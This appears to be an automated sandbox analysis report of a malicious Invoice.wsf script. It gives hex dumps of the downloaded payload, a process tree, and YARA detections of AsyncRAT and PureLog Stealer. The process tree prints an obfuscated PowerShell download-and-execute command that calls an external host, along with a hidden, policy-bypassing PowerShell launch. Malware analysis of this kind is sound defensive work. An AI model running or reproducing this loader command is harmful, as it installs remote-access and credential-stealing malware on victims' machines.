                                    Data Ascii: %00%&%00%&%06%&%72%&%7F%&%30%&%00%&%70%&%6F%&%B1%&%00%&%00%&%06%&%17%&%80%&%21%&%00%&%00%&%04%&%38%&%15%&%00%&%00%&%00%&%06%&%72%&%9D%&%30%&%00%&%70%&%6F%&%A4%&%00%&%00%&%06%&%72%&%51%&%25%&%00%&%70%&%6F%&%B1%&%00%&%00%&%06%&%7E%&%1F%&%00%&%00%&%04%&%72%&
                                    2024-08-29 17:41:57 UTC8000INData Raw: 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 33 39 25 26 25 30 36 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 36 46 25 26 25 33 36 25 26 25 30 30 25 26 25 30 30 25 26 25 30 41 25 26 25 44 43 25 26 25 30 37 25 26 25 32 41 25 26 25 30 30 25 26 25 30 30 25 26 25 30 31 25 26 25 31 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 32 25 26 25 30 30 25 26 25 30 36 25 26 25 30 30 25 26 25 31 44 25 26 25 32 33 25 26 25 30 30 25 26 25 30 44 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 31 42 25 26 25 33 30 25 26 25 30 34 25 26 25 30 30 25 26 25 38 41 25 26 25 30 33 25 26 25 30 30 25 26 25 30 30 25 26 25 31 30 25 26 25 30 30 25 26 25 30 30 25 26 25 31 31 25 26 25 30 32 25 26 25 31 36 25 26 25 33 46 25 26 25 37 35 25 26
                                    Data Ascii: %00%&%00%&%06%&%39%&%06%&%00%&%00%&%00%&%06%&%6F%&%36%&%00%&%00%&%0A%&%DC%&%07%&%2A%&%00%&%00%&%01%&%10%&%00%&%00%&%02%&%00%&%06%&%00%&%1D%&%23%&%00%&%0D%&%00%&%00%&%00%&%00%&%1B%&%30%&%04%&%00%&%8A%&%03%&%00%&%00%&%10%&%00%&%00%&%11%&%02%&%16%&%3F%&%75%&
                                    2024-08-29 17:41:57 UTC8000INData Raw: 25 32 38 25 26 25 36 33 25 26 25 30 30 25 26 25 30 30 25 26 25 30 41 25 26 25 31 33 25 26 25 30 34 25 26 25 44 44 25 26 25 30 44 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 32 36 25 26 25 37 32 25 26 25 30 37 25 26 25 33 43 25 26 25 30 30 25 26 25 37 30 25 26 25 31 33 25 26 25 30 34 25 26 25 44 44 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 31 31 25 26 25 30 34 25 26 25 32 41 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 31 25 26 25 31 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 41 44 25 26 25 41 44 25 26 25 30 30 25 26 25 30 44 25 26 25 33 35 25 26 25 30 30 25 26 25 30 30 25 26 25 30 31 25 26 25 31 42 25 26 25 33 30 25 26 25 30 32 25 26 25 30 30 25 26
                                    Data Ascii: %28%&%63%&%00%&%00%&%0A%&%13%&%04%&%DD%&%0D%&%00%&%00%&%00%&%26%&%72%&%07%&%3C%&%00%&%70%&%13%&%04%&%DD%&%00%&%00%&%00%&%00%&%11%&%04%&%2A%&%00%&%00%&%00%&%01%&%10%&%00%&%00%&%00%&%00%&%00%&%00%&%AD%&%AD%&%00%&%0D%&%35%&%00%&%00%&%01%&%1B%&%30%&%02%&%00%&
                                    2024-08-29 17:41:57 UTC8000INData Raw: 25 35 41 25 26 25 31 35 25 26 25 37 39 25 26 25 44 39 25 26 25 33 42 25 26 25 36 32 25 26 25 30 31 25 26 25 30 30 25 26 25 30 30 25 26 25 30 38 25 26 25 32 30 25 26 25 31 45 25 26 25 43 41 25 26 25 44 32 25 26 25 44 43 25 26 25 33 42 25 26 25 34 32 25 26 25 30 31 25 26 25 30 30 25 26 25 30 30 25 26 25 33 38 25 26 25 43 32 25 26 25 30 44 25 26 25 30 30 25 26 25 30 30 25 26 25 30 38 25 26 25 32 30 25 26 25 43 45 25 26 25 36 45 25 26 25 39 38 25 26 25 46 31 25 26 25 34 32 25 26 25 31 42 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 38 25 26 25 32 30 25 26 25 34 35 25 26 25 46 44 25 26 25 42 36 25 26 25 45 30 25 26 25 33 42 25 26 25 37 46 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 38 25 26 25 32 30 25 26 25 43 45 25 26 25 36 45 25 26
                                    Data Ascii: %5A%&%15%&%79%&%D9%&%3B%&%62%&%01%&%00%&%00%&%08%&%20%&%1E%&%CA%&%D2%&%DC%&%3B%&%42%&%01%&%00%&%00%&%38%&%C2%&%0D%&%00%&%00%&%08%&%20%&%CE%&%6E%&%98%&%F1%&%42%&%1B%&%00%&%00%&%00%&%08%&%20%&%45%&%FD%&%B6%&%E0%&%3B%&%7F%&%00%&%00%&%00%&%08%&%20%&%CE%&%6E%&
                                    2024-08-29 17:41:57 UTC8000INData Raw: 25 37 32 25 26 25 34 35 25 26 25 32 32 25 26 25 30 30 25 26 25 37 30 25 26 25 36 46 25 26 25 41 34 25 26 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 37 32 25 26 25 44 37 25 26 25 33 45 25 26 25 30 30 25 26 25 37 30 25 26 25 36 46 25 26 25 42 31 25 26 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 32 35 25 26 25 37 32 25 26 25 44 31 25 26 25 33 45 25 26 25 30 30 25 26 25 37 30 25 26 25 36 46 25 26 25 41 34 25 26 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 30 36 25 26 25 37 42 25 26 25 33 36 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 37 32 25 26 25 35 46 25 26 25 33 45 25 26 25 30 30 25 26 25 37 30 25 26 25 36 46 25 26 25 41 34 25 26 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 36 46 25 26 25 39 46 25 26 25 30 30 25 26 25 30 30 25 26
                                    Data Ascii: %72%&%45%&%22%&%00%&%70%&%6F%&%A4%&%00%&%00%&%06%&%72%&%D7%&%3E%&%00%&%70%&%6F%&%B1%&%00%&%00%&%06%&%25%&%72%&%D1%&%3E%&%00%&%70%&%6F%&%A4%&%00%&%00%&%06%&%06%&%7B%&%36%&%00%&%00%&%04%&%72%&%5F%&%3E%&%00%&%70%&%6F%&%A4%&%00%&%00%&%06%&%6F%&%9F%&%00%&%00%&


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:13:41:52
                                    Start date:29/08/2024
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Invoice.wsf"
                                    Imagebase:0x7ff731c60000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:1
                                    Start time:13:41:54
                                    Start date:29/08/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:13:41:54
                                    Start date:29/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:13:42:00
                                    Start date:29/08/2024
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs"
                                    Imagebase:0x7ff731c60000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:13:42:00
                                    Start date:29/08/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" "
                                    Imagebase:0x7ff6cc330000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:13:42:00
                                    Start date:29/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:13:42:00
                                    Start date:29/08/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'"
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.1968474602.000002389D3D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.1876842507.0000023886B23000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:8
                                    Start time:13:42:13
                                    Start date:29/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                    Imagebase:0x7ff7699e0000
                                    File size:45'984 bytes
                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.4121148795.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                    Reputation:high
                                    Has exited:false

                                    Disassembly

                                    Reset < >

                                      Executed Functions

                                      Function 00007FFD9B82A7A2 Relevance: 3.3, Strings: 2, Instructions: 802COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: U$u?_H
                                      • API String ID: 0-4013083417
                                      • Opcode ID: 49861f4a211f7b93c73f7f23044c5edb8ff133bdc602f3d1ea3d86a7b8906a79
                                      • Instruction ID: 4929b504a45dc00c5fbb167bb7ece27379c07dc6eec7536afdece0b728a8ac4b
                                      • Opcode Fuzzy Hash: 49861f4a211f7b93c73f7f23044c5edb8ff133bdc602f3d1ea3d86a7b8906a79
                                      • Instruction Fuzzy Hash: 82422872A0EBCD5FE7A69B6848651A87BE1EF1A350F0900FED489C71E3DA286D05C741
                                      Function 00007FFD9B824B2A Relevance: 2.1, Strings: 1, Instructions: 809COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: U
                                      • API String ID: 0-3372436214
                                      • Opcode ID: 39875c65c461b90320c57bc4b6649cc6c0585115318321633de39eee1e239e88
                                      • Instruction ID: 68f717d7399e372220ef8c9ae08077de4a952ddd0ee2becdcfb40cb3fa87c4a1
                                      • Opcode Fuzzy Hash: 39875c65c461b90320c57bc4b6649cc6c0585115318321633de39eee1e239e88
                                      • Instruction Fuzzy Hash: F2424422A0FB8A0FE7A6976848B15A87BE1EF5A250F0D01FED09CCB1E7DD196D05C351
                                      Function 00007FFD9B82458A Relevance: 1.6, Strings: 1, Instructions: 387COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: U
                                      • API String ID: 0-3372436214
                                      • Opcode ID: b0f741435d219d4f06b18416c5128df41306b83b0910ae3adbd0e7b65f4a3882
                                      • Instruction ID: 1938e6d2c2a28af06a15b3388e0610d4fe9ebcbbca1ff03658e798fe1e199770
                                      • Opcode Fuzzy Hash: b0f741435d219d4f06b18416c5128df41306b83b0910ae3adbd0e7b65f4a3882
                                      • Instruction Fuzzy Hash: 09C12722A0FBC90FE7A6976848645653FE1DF46250B0E01FFD19DCB0EBD919AD06C362
                                      Function 00007FFD9B825302 Relevance: .8, Instructions: 785COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5e759267dc2fe5820996b28a9d41fbc762038be8ab396f8b5575ed88bc2e90be
                                      • Instruction ID: a6c7c79dcec4ae48e6772eacf0c51b408feb69e4f07a0477b1725c81a8b7b6e5
                                      • Opcode Fuzzy Hash: 5e759267dc2fe5820996b28a9d41fbc762038be8ab396f8b5575ed88bc2e90be
                                      • Instruction Fuzzy Hash: 6C325622B4FB890FE7A59B6888755F87BE1EF5A260F0901FAD04CCB1E3DD19AD058341
                                      Function 00007FFD9B822964 Relevance: .8, Instructions: 765COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e6f905b7df4154b936f2f1d2c3bbb97a6c78dc9c3945e99abcd00896cfa95d53
                                      • Instruction ID: 2f25b59d39b4dabbac8e31cae746b4ca948e6bf420b09382d8eb35f5dce4ec33
                                      • Opcode Fuzzy Hash: e6f905b7df4154b936f2f1d2c3bbb97a6c78dc9c3945e99abcd00896cfa95d53
                                      • Instruction Fuzzy Hash: A5322432A0EA8D0FE7A5DFA888A45B47BE1EF5A350B0901FED48DC71E7D919AD05C341
                                      Function 00007FFD9B821E22 Relevance: .5, Instructions: 526COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 16123169d8c60d3733c07d33e06e453ffc9e112424e8c1e92de51fdb234ab922
                                      • Instruction ID: 4e813d11836f5f5ff5244eaa809d6a86a0ee2de344c6108a7f75cdd2ae0d9082
                                      • Opcode Fuzzy Hash: 16123169d8c60d3733c07d33e06e453ffc9e112424e8c1e92de51fdb234ab922
                                      • Instruction Fuzzy Hash: C3F13722B0EBC90FEBA6DBA848605747BE1EF5A250B1901FBD45CCB1F7D919AD05C341
                                      Function 00007FFD9B82351A Relevance: .4, Instructions: 376COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6f1489dbef0ec3e875ed65f99857b9f0b51fcb04f430c29a8f19af74584d2e58
                                      • Instruction ID: a66fbc9c07216a961e63b36da85b12928dc488ae5a7f766eb4c07a99b43813e1
                                      • Opcode Fuzzy Hash: 6f1489dbef0ec3e875ed65f99857b9f0b51fcb04f430c29a8f19af74584d2e58
                                      • Instruction Fuzzy Hash: 39C10562A0FBC94FE7A6977848741657FE19F4B260B0A01FFD09CCB1E7DA19A906C341
                                      Function 00007FFD9B8262FA Relevance: 1.9, Strings: 1, Instructions: 626COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: W
                                      • API String ID: 0-655174618
                                      • Opcode ID: 8aae5e0d0419ab6512d7e8b64ff4cd9f23b4b06ed72a364c2cd6fa29e78d09e9
                                      • Instruction ID: e01fc5c640b3ede8d88465d215623344412b34bf16b59efbd10586f90659c4cd
                                      • Opcode Fuzzy Hash: 8aae5e0d0419ab6512d7e8b64ff4cd9f23b4b06ed72a364c2cd6fa29e78d09e9
                                      • Instruction Fuzzy Hash: 781225A2A0FAC90FE7669B6858755B47BD1EF5A250B0901FBD08CCB0E7DD19AD05C381
                                      Function 00007FFD9B82150C Relevance: 1.7, Strings: 1, Instructions: 413COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: x
                                      • API String ID: 0-2363233923
                                      • Opcode ID: 6fb6d5ac09bb52a43dc7cffede91cb8fcbe86c393aa4a8066b6d386bd6ebd04b
                                      • Instruction ID: 7371589686faa68db8f63e23e4ea60c1686f6ae99fd9a96ca5e8aaa573b096b3
                                      • Opcode Fuzzy Hash: 6fb6d5ac09bb52a43dc7cffede91cb8fcbe86c393aa4a8066b6d386bd6ebd04b
                                      • Instruction Fuzzy Hash: 80C16C22F0EA8D0FEB65A7A888655B47BD0EF5A350B1901FBE08DC71F7D919AD06C341
                                      Function 00007FFD9B82AC20 Relevance: 1.6, Strings: 1, Instructions: 368COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: u?_H
                                      • API String ID: 0-397845798
                                      • Opcode ID: fe3e24831e79683b20e4f5401c8695acc2c15ade5d118e72f035aa64202ee50a
                                      • Instruction ID: 0f2e428a97d00fb602b227d110f9723da06bbbf9e9637a8e41b5db48b6aecfaf
                                      • Opcode Fuzzy Hash: fe3e24831e79683b20e4f5401c8695acc2c15ade5d118e72f035aa64202ee50a
                                      • Instruction Fuzzy Hash: 81D1BF62E0FACE5FEBB2AB6848651A87AD1AF19344F0900FED09CC61E7DD386D458701
                                      Function 00007FFD9B8297B4 Relevance: 1.6, Strings: 1, Instructions: 364COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: U
                                      • API String ID: 0-3372436214
                                      • Opcode ID: f7f59df53c0e2047e85d3be57107cb22f491af2da02a5da4039a850e7bdc2bb4
                                      • Instruction ID: 4a5f4a0fb6b79c841cd7201ec07ee730bd6db5a0d058e9d869788c01da50a4c7
                                      • Opcode Fuzzy Hash: f7f59df53c0e2047e85d3be57107cb22f491af2da02a5da4039a850e7bdc2bb4
                                      • Instruction Fuzzy Hash: 4EC12632A0EB890FE7A59B6848691B87BD1EF5A364F1905BEC05DC71E7DD18AC05C341
                                      Function 00007FFD9B828A44 Relevance: 1.5, Strings: 1, Instructions: 285COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: U
                                      • API String ID: 0-3372436214
                                      • Opcode ID: 06e0486b4bf2db1463c382b2e4353454fccdbece6e62b90e628b9bcfb3135388
                                      • Instruction ID: 4d225c80e21df5a3f71d1dd765e690d959b8b692b01879aef7efb506d1b3892d
                                      • Opcode Fuzzy Hash: 06e0486b4bf2db1463c382b2e4353454fccdbece6e62b90e628b9bcfb3135388
                                      • Instruction Fuzzy Hash: 3B914462B0FB890FEBA59B6844602797BD2EF99250F1901FED05DCB1E7DE18AC06C341
                                      Function 00007FFD9B822529 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: U
                                      • API String ID: 0-3372436214
                                      • Opcode ID: cbce9c4907965886774421451d2168954663331a6bf0dde8041bfc5cb3b7c61c
                                      • Instruction ID: 6af3904a8314c904b6d5ed9cc6cc4682e030c795cd5061482e1f5f206336a919
                                      • Opcode Fuzzy Hash: cbce9c4907965886774421451d2168954663331a6bf0dde8041bfc5cb3b7c61c
                                      • Instruction Fuzzy Hash: 8641277151D7C84FD75A8F6898256A47FF0EF9B320F09429FE089C3193C624A906C792
                                      Function 00007FFD9B7567FB Relevance: .6, Instructions: 609COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750084634.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d0954fecc4e04912eb94454d18a9d5115eada83ab0f2d0569bd52869007a55c3
                                      • Instruction ID: 371d80ba90d771da9724a1eb40aa5bc9365d7ab9a912407ad54bfad519ab4cb7
                                      • Opcode Fuzzy Hash: d0954fecc4e04912eb94454d18a9d5115eada83ab0f2d0569bd52869007a55c3
                                      • Instruction Fuzzy Hash: E8122431B09B4D4FDB94DFACC465AA97BE1FF68300F1542BAD449C72A6DA24E842C781
                                      Function 00007FFD9B75604A Relevance: .4, Instructions: 421COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750084634.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e651d497e74f358b4d4fa878cd947e4b32adac035d3ad240d31f1955d4ba4c09
                                      • Instruction ID: ad3024058a023a5b940683ee867cad5549187b92a283e4201e4b5ec21c5c9a98
                                      • Opcode Fuzzy Hash: e651d497e74f358b4d4fa878cd947e4b32adac035d3ad240d31f1955d4ba4c09
                                      • Instruction Fuzzy Hash: 2BD19231B08A4D8FDF94DF9CC465AA97BF1FF58300F15426AD409D72A6CA74E982CB80
                                      Function 00007FFD9B823D04 Relevance: .4, Instructions: 366COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: acf6e1a5561c30cafb9a2817403af7a2744952941c9ad165f94ec714ce1fa6fb
                                      • Instruction ID: 9593b8bc4b7b93b5cada28b048cb47ae9208b6908fab290fd29ad490bf0627d9
                                      • Opcode Fuzzy Hash: acf6e1a5561c30cafb9a2817403af7a2744952941c9ad165f94ec714ce1fa6fb
                                      • Instruction Fuzzy Hash: 39C13432E0FA890FE7A5976848B11B87BE1EF5A264F1901BED45CC71E7DE28AD05C341
                                      Function 00007FFD9B8280F4 Relevance: .4, Instructions: 364COMMON
                                      Download Yara Rule
                                      Memory Dump Source
